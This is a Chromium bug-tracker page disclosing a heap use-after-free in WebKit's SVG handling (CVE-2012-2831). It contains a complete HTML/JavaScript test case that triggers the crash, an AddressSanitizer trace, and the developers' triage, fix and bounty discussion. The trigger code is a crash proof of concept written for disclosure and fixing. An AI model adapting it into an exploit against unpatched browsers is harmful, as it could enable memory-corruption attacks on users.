Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Reported by miau...@gmail.com, May 30 2012 Back to list

VULNERABILITY DETAILS
use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

VERSION
Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)

        document.body.appendChild(document.createTextNode('A'))

        el1=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el1.setAttribute('id','el1')
        el1.appendChild(document.createTextNode('A'))
        document.body.appendChild(el1)

        document.body.appendChild(document.createTextNode('A'))

        el2=document.createElementNS('http://www.w3.org/2000/svg', 'image')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)

        el3=document.createElementNS('http://www.w3.org/2000/svg', 'textPath')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el1')
        el2.appendChild(el3)

        el4=document.createElementNS('http://www.w3.org/2000/svg', 'use')
        el4.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el2')
        el0.appendChild(el4)

        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('ForwardDelete')
        setTimeout("location.reload()", 10)
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 


==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0


0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0


 
0392.txt
12.4 KB View Download
0392.html
1.4 KB View Download
Cc: fmalita@chromium.org pdr@chromium.org schenney@chromium.org
Labels: WebKit-SVG
Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=53433906

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
  WebCore::SVGElement::removedFrom
  - free stack -
  WebCore::SVGElementInstance::detach
  WebCore::SVGElementInstance::~SVGElementInstance
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=139300:139395

Minimized Testcase (1.10 Kb): https://cluster-fuzz.appspot.com/download/AMIfv968MsHol1ezUseel0zNe5P-oaASUNtgTePunUuguxHTOK7rPf9Ru4zchHA_0hpVVeJce2QxCiJW1IxrXN6BK8BCTlov6UkFNI1qHHdwJnyzZrlarRIN0PkPXD1t_VQjgZNyu9r1tn7nrmRmBSIbVYU2gxQj5s66LkRBOnQzYdrOG8X1B9c
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regresse
Comment 4 by pdr@chromium.org, Jun 1 2012
https://bugs.webkit.org/show_bug.cgi?id=15799 looks like the most probable regresse
Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)
Comment 6 by pdr@chromium.org, Jun 1 2012
Labels: WebKit-ID-88144
Upstream: https://bugs.webkit.org/show_bug.cgi?id=88144
Owner: pdr@chromium.org
According to https://bugs.webkit.org/show_bug.cgi?id=15799, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)
Comment 8 by pdr@chromium.org, Jun 5 2012
This bug is still present, you need to use an ASAN build to hit it though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.
Comment 9 by pdr@chromium.org, Jun 6 2012
I'm now on this bug.
Comment 10 by pdr@chromium.org, Jun 12 2012
Small update: I haven't forgotten about this (it's my top issue).
Comment 11 by pdr@chromium.org, Jun 14 2012
Patch up!
Comment 12 by pdr@chromium.org, Jun 14 2012
@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.
Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/120559. Philip, does this need merging for m20 ? that function looked old, it might be that some new code just helped to trigger this.
Comment 14 by pdr@chromium.org, Jun 18 2012
I think this does need merging. http://trac.webkit.org/changeset/118609 introduced the textPath regression, but http://trac.webkit.org/changeset/107067 is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.
Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta
Perfect.
Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M20: http://trac.webkit.org/changeset/120762
Labels: reward-topanel
Comment 18 by pdr@chromium.org, Jun 19 2012
Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
<image>
  <textPath/>
</image>
to begin with.
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Labels: CVE-2012-2831
Labels: -reward-unpaid
Project Member Comment 23 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Comment 25 by laforge@google.com, Jan 18 2013
Labels: Restrict-View-EditIssue
Project Member Comment 26 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High
Project Member Comment 27 by bugdroid1@chromium.org, Mar 14 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 30 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 31 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 32 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 33 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 34 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member Comment 35 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 36 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 37 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment